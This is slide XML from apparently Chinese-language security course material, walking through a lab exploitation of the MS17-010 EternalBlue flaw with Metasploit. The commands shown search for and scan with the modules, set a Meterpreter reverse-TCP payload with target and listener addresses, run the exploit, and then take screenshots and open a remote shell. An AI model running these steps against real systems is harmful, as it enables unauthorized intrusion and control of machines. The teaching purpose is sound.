            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>搜索可利用的漏洞，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>search ms17-010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ms17-010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞，需要用到两个功能模块，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞扫描模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/smb_ms17_010</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞利用模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/ms17_010_eternalblue</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="图片 2" descr="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7568" y="2300662"/>
            <a:ext cx="7374653" cy="257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669740" y="5136888"/>
            <a:ext cx="3422732"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charset="0"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-1-10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms17-010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F050202020403020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32435"/>
            <a:ext cx="10515600" cy="5923915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用漏洞扫描模块“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/smb_ms17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>”进行漏洞扫描，并用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令显示配置参数，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3243407" y="5673873"/>
            <a:ext cx="3672782" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图3-1-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞扫描模块配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="图片 3" descr="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4731" y="1777524"/>
            <a:ext cx="6588818" cy="3582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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用漏洞利用模块“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/ms17_010_eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>”进行漏洞攻击，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令显示配置参数，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3702281" y="5564678"/>
            <a:ext cx="3638550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-12  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>显示漏洞攻击信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="图片 4" descr="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1276" y="1610706"/>
            <a:ext cx="7428403" cy="3510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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>设置攻击载荷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、攻击目标、监听主机参数，这里采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>反弹载荷，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>设置攻击载荷：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>set  payload  windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>设置攻击目标（靶机）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>set  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  192.168.66.30</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>设置监听主机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>set  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  192.168.66.5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3702281" y="5564678"/>
            <a:ext cx="3638550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图3-1-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>设置攻击载荷参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="图片 5" descr="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39306" y="2764588"/>
            <a:ext cx="9418376" cy="158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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令开始攻击，可以看到监听主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.66.5:4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>与靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.66.30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>49159</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>之间已经建立了连接，然后反弹回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3702281" y="5564678"/>
            <a:ext cx="3638550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图3-1-14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>执行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="图片 6" descr="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87236" y="1411445"/>
            <a:ext cx="7132319" cy="389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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令显示远程主机系统信息，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令对远程主机当前屏幕进行截图，并保存至攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>目录下，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2510444" y="5128906"/>
            <a:ext cx="4414751" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>对远程主机当前屏幕进行截图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="图片 7" descr="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65472" y="1575204"/>
            <a:ext cx="6397625" cy="189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531743" y="3651657"/>
            <a:ext cx="3332964" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3-1-15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>显示远程主机系统信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="图片 9" descr="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5347" y="4441478"/>
            <a:ext cx="6297873"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415026" y="-203755"/>
              <a:ext cx="1066603"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01</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lang="en-US" altLang="zh-CN" sz="40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40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6407150" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.1.1 MS12_020漏洞利用与安全加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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42798" y="412172"/>
            <a:ext cx="10515600" cy="5973445"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398740" y="4787041"/>
            <a:ext cx="4050596" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>截图保存至攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>目录下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="图片 10" descr="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2051" y="866009"/>
            <a:ext cx="6625243" cy="3269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6543" y="263503"/>
            <a:ext cx="10515600" cy="5973445"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>控制台，当转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C:\Windows\system32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>目录下，说明已经获得了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的控制权，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
